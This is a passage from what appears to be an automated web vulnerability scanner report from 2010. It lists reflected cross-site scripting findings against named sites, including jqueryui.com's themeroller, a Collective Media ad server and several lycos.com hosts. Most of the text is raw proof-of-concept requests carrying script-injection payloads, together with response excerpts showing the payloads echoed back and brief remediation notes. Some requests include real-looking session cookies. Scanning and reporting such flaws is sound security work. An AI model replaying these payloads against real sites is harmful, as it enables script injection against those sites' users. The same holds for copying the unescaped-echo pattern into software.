GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30dd14c"><script>alert(1)</script>f7a209fba9&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120064
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5e33"><script>alert(1)</script>b5761ac56ec was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxc5e33"><script>alert(1)</script>b5761ac56ec&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b947'-alert(1)-'faa1d4c7922 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.idg_b2c5b947'-alert(1)-'faa1d4c7922/;sz=728x90;net=cm;ord=5241744;env=ifr;ord1=854900;cmpgurl=http%253A//mail.lycos.com/lycos/Index.lycos? HTTP/1.1 Host: k.collective-media.net Proxy-Connection: keep-alive Referer: http://www.mail.lycos.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sun, 12 Dec 2010 14:27:46 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net Content-Length: 7380
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-57666374_1292164066","http://ib.adnxs.com/ptj?member=311&inv_code=cm.idg_b2c5b947'-alert(1)-'faa1d4c7922&size=728x90&referrer=http%3A%2F%2Fmail.lycos.com%2Flycos%2FIndex.lycos&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.idg_b2c5b947%27-alert%281%29-%27faa1d4c7922%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-57666374_1 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee53c'-alert(1)-'3c2da3549e8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.idg_b2c/;sz=ee53c'-alert(1)-'3c2da3549e8 HTTP/1.1 Host: k.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc-dal; optout=1; JY57=opt_out;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7288 Date: Sun, 12 Dec 2010 14:34:24 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-41320597_1292164464","http://ib.adnxs.com/ptj?member=311&inv_code=cm.idg_b2c&size=ee53c'-alert(1)-'3c2da3549e8&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.idg_b2c%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-41320597_1292164464%2C%2Cnone%2C%3B%3Bcmw%3Dnurl%3Bsz%3Dee53c%27-alert%281%29-%273c2da3549e8%3Bcontx%3Dnone ...[SNIP]...
3.118. http://peoplesearch.lycos.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://peoplesearch.lycos.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2147"><script>alert(1)</script>caa0e56bdf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=people&b2147"><script>alert(1)</script>caa0e56bdf9=1 HTTP/1.1 Host: peoplesearch.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:28:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19486
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?tab=people&b2147"><script>alert(1)</script>caa0e56bdf9=1&mobile=1"> ...[SNIP]...
The value of the search-type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f361d"><script>alert(1)</script>60b9214b859 was submitted in the search-type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=people&search-type=white_pagesf361d"><script>alert(1)</script>60b9214b859 HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18746
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?tab=people&search-type=white_pagesf361d"><script>alert(1)</script>60b9214b859&mobile=1"> ...[SNIP]...
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7863b"><script>alert(1)</script>a804a600e0d was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=people7863b"><script>alert(1)</script>a804a600e0d HTTP/1.1 Host: peoplesearch.lycos.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:28:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?tab=people7863b"><script>alert(1)</script>a804a600e0d&mobile=1"> ...[SNIP]...
3.121. http://peoplesearch.lycos.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://peoplesearch.lycos.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 353e6"><script>alert(1)</script>5876eddc96c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?353e6"><script>alert(1)</script>5876eddc96c=1 HTTP/1.1 Host: peoplesearch.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19469
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?353e6"><script>alert(1)</script>5876eddc96c=1&mobile=1"> ...[SNIP]...
3.122. http://registration.lycos.com/forgot.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://registration.lycos.com
Path:
/forgot.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f715"><script>alert(1)</script>0a78a0c622c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forgot.php/4f715"><script>alert(1)</script>0a78a0c622c HTTP/1.1 Host: registration.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:34:51 GMT Server: Set-Cookie: PENTA=174.121.222.18.1292164491267196; path=/; domain=.lycos.com X-Powered-By: PHP/5.1.6 Set-Cookie: isMobile=deleted; expires=Sat, 12-Dec-2009 14:34:50 GMT Set-Cookie: isMobile=mobile; expires=Sun, 12-Dec-2010 15:34:51 GMT; path=/; domain=lycos.com Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Content-Length: 5935 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>LYCOS NETWORK: Registration Forgot Password</title>
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a61f"><script>alert(1)</script>cb2791bb9c4 was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=multi&cat=images6a61f"><script>alert(1)</script>cb2791bb9c4 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:04 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:04 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17603
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_images6a61f"><script>alert(1)</script>cb2791bb9c4&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b88f"%3balert(1)//ab61ce09937 was submitted in the cat parameter. This input was echoed as 2b88f";alert(1)//ab61ce09937 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?tab=multi&cat=images2b88f"%3balert(1)//ab61ce09937 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:04 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:04 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17530
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <!-- var cm_host = "multimedia.lycos.com"; var cm_taxid = "/results_images2b88f";alert(1)//ab61ce09937"; //--> ...[SNIP]...
The value of the mobile request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8ead"><script>alert(1)</script>b7a2c77f357 was submitted in the mobile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=people&mobile=d8ead"><script>alert(1)</script>b7a2c77f357 HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:35:04 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:04 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17232
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <a href="http://search.lycos.com/?tab=people&mobile=d8ead"><script>alert(1)</script>b7a2c77f357&mobile=1"> ...[SNIP]...
3.126. http://search.lycos.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://search.lycos.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca07a"><script>alert(1)</script>4cdc20754fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=web&query=%27&x=0&y=0&ca07a"><script>alert(1)</script>4cdc20754fc=1 HTTP/1.1 Host: search.lycos.com Proxy-Connection: keep-alive Referer: http://www.lycos.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:33 GMT; path=/ Set-Cookie: LYCOS_SEARCH=i4ndl3gvfld9s3lgl65ehmk080; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19255
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search Resu ...[SNIP]... <a href="http://search.lycos.com/?tab=web&query=%27&x=0&y=0&ca07a"><script>alert(1)</script>4cdc20754fc=1&mobile=1"> ...[SNIP]...
The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd8f5"><script>alert(1)</script>616be4478a0 was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=web&query=%27bd8f5"><script>alert(1)</script>616be4478a0&x=0&y=0 HTTP/1.1 Host: search.lycos.com Proxy-Connection: keep-alive Referer: http://www.lycos.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:29:12 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:12 GMT; path=/ Set-Cookie: LYCOS_SEARCH=p6laldmb2g7ohngk9ohi37mec0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46867
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search Resu ...[SNIP]... <a href="http://search.lycos.com/?tab=web&query=%27bd8f5"><script>alert(1)</script>616be4478a0&x=0&y=0&mobile=1"> ...[SNIP]...
The value of the query request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34964"%3balert(1)//0334fee274d was submitted in the query parameter. This input was echoed as 34964";alert(1)//0334fee274d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
